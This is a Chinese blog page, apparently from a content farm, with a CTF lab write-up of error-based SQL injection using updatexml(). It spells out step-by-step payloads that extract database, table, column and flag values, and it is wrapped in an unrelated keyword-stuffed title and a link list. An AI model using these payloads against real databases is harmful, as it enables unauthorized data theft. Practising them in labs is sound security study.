当前位置: 首页 > news >正文

取消网站的通知asp做微网站

news 2025/9/17 17:06:18
取消网站的通知,asp做微网站,网页设计教程安利 杨松,wordpress调用指定相关文章进入靶场 按照提示输入1 显示查询正确 既然是报错注入,先判断整形还是字符型注入 先输入1 and 11 再输入1 and 12 都显示查询正确,可知此为字符串型注入,不是数字型注入 然后就不会了 求助AI和其他wp 由以上2张搜索结果知updatexml是适用…

进入靶场

按照提示输入1

显示查询正确

既然是报错注入,先判断整形还是字符型注入

先输入1 and 1=1

再输入1 and 1=2

都显示查询正确,可知此为字符串型注入,不是数字型注入

然后就不会了

求助AI和其他wp

由以上2张搜索结果知updatexml是适用于字府串型注入的函数,且知道大概用法,开始注入

爆出库名          1 and updatexml(1,concat(0x7e,database()),3)

爆出表名                 1 and updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema='sqli')),3)

爆出字段名           1 and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_name='flag')),3)

 并没有显示字段名,添加了库名后才显示,应该是含有多个flag表,添加库名缩小了范围便显示出来了

1 and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema='sqli' and table_name='flag')),3)

爆出字段内容        1 and updatexml(1,concat(0x7e,(select group_concat(flag)from sqli.flag)),3)

得到flag

笔记

1,报错注入先判断是字府串型注入还是数字注入

2,判断出类型便可运用相关函数

3,updatexml函数

 1 and updatexml(1,concat(0x7e,database()),3)

第一个与第三个参数随便写,因为我们并不用它,参数2处的concat 是一个用于连接字符串的函数,0x7e代表16进制,避免特殊字符造成的错误

http://www.yayakq.cn/news/663005/

相关文章:

  • 网站的设计亮点玉山县建设局网站
  • 商丘网站建设流程微商城和小程序区别
  • 专业网站制作网络公司word页面设计
  • 哪些是网站建设手机网站专题页
  • 聊城网站建设设计湖南响应式官网建设哪家好
  • 淘宝客cms网站模板下载地址网站设计机构
  • 免费行情软件网站下载安装建设旅游网站的价值
  • 秦皇岛在建工程项目windows优化大师官网
  • 站长统计app进入网址新版宝安做棋牌网站建设哪家好
  • 网站后台排版布局百度在线入口
  • php网站建设案例教程视频教程青州网页定制
  • 网站建设工程师的职位要求物流公司在哪里找
  • 福州思企互联网站建设公司怎么样计算机多媒体辅助教学网站开发
  • 怎么用php源代码做网站制作app的网站哪个好
  • 网站的建设时间表wordpress全站音乐
  • 中国建设协会官网站网站做的和别人一样违法
  • 做羞羞的专门网站设计网站建设图片
  • 贵阳网站建设设计网站备案 异地
  • 高端品牌型 营销型网站建设商城网站开发用什么框架
  • 单页面网站建设网站备案咨询
  • php网站开发实例教程案例数据库网站制作
  • 做推送的网站除了秀米还有图片在线编辑网站
  • jquery网站底部导航效果wordpress 4.8.2 主题
  • 工程网站建设方案社交博客网站开发
  • 福田附近网站开发公司免费科技软件
  • php怎么做全网小视频网站创建个人网站制作流程步骤
  • 网站维护 北京公司做网站好吗
  • 网站建设进什么分录广州哪家公司做网站
  • 建设网站 关于竣工结算的期限seo职位信息
  • 可以建设彩票网站吗哪个app可以找培训班